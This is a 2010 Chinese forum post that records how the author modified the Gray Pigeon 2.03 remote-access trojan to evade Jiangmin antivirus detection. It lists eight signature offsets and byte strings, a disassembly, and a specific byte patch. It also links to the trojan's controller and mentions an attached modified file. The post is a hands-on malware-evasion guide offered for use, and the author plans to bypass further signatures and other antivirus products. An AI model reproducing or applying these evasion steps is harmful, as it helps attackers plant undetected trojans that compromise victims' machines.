2010.1.21灰鸽子2.03江民表面特征码及修改手记
在昨天定位的特征码上修改的,刚才改完查杀了一下,还是过表面的。手记和附件一起附上。有时间了再定位内存和主动特征码,再有时间再过其它杀软。
另,本人时间不多,有事的用QQ邮件联系,QQ上很少回复。
主控端在这个帖子下载。
http://www.nb5.cn/thread-382890-1-1.html
2010.01.21
江民表面特征码:
CharactorTotal=8
Codz1=H_0009DE1C_0009DE36_0000001B_000B2A6F
CODE
0049EA1C
关闭 Http代理 命令执行完毕!
停止 Http代理 命令执行完毕!
Codz2=H_0009DE40_0009DE5C_0000001D_000B2A6F
CODE
0049EA40
B4 F2 BF AA 20 53 6F 63 6B 73
打开 Socks5 代理 命令执行完毕
启动 Socks5 代理 命令执行完毕
Codz3=H_000A35D0_000A35EA_0000001B_000B2A6F
CODE
004A41D0
D5 B3 CC F9 B0 E5 C4 DA C8 DD
粘贴板内容为空或非文本信息.
粘贴板内容为非文本信息或空.
Codz4=H_000A4FE4_000A4FEE_0000000B_000B2A6F
CODE
004A5BE4
C5 AE E6 B4 B2 B9 CC EC C8 D5
女娲补天日.
后异射日时
Codz5=H_000A5054_000A505E_0000000B_000B2A6F
CODE
004A5C54
C5 AE E6 B4 B2 B9 CC EC C8 D5
女娲补天日.
虎年将起时
Codz6=H_000A5888_000A5892_0000000B_000B2A6F
CODE
004A6488
C5 AE E6 B4 B2 B9 CC EC C8 D5
女娲补天日.
花花闻乐间
Codz7=H_000B283E_000B2847_0000000A_000B2A6F
123
004C603E
60 61 90 90 90 0F 2A 00 31 C0
Codz8=H_000B3D03_000B3D23_00000021_000B2A6F
地址超出了区段定义的范围,为附加数据
内存地址转换不了,但可能是代码~
B5 51 71 92 E1 6D 2F 67 C0 5E 0A 90 5C
AB 37 1A 91 76 F7 5F 13 DA DA E1 FC 60 04 B0 C1
27 98 FC 84
看下面对应的代码,可以确定相关数据不是代码了。
004C626F >B5 51 mov ch, 51
004C6271^ 71 92 jno short 004C6205
004C6273 E1 6D loopdeshort 004C62E2
004C6275 2F das
004C6276 67:C05E 0A 90 rcr byte ptr , 90
004C627B 5C pop esp
004C627C AB stos dword ptr es:
004C627D 37 aaa
004C627E 1A91 76F75F13 sbb dl, byte ptr
004C6284 DADA fcmovust, st(2)
004C6286^ E1 FC loopdeshort 004C6284
004C6288 60 pushad
004C6289 04 B0 add al, 0B0
004C628B C127 98 shl dword ptr , 98
004C628E FC cld
004C628F 84
把最后一个84改86
江民还是很容易过的,几乎都杀字符串。 沙发???牛!!!
页:
[1]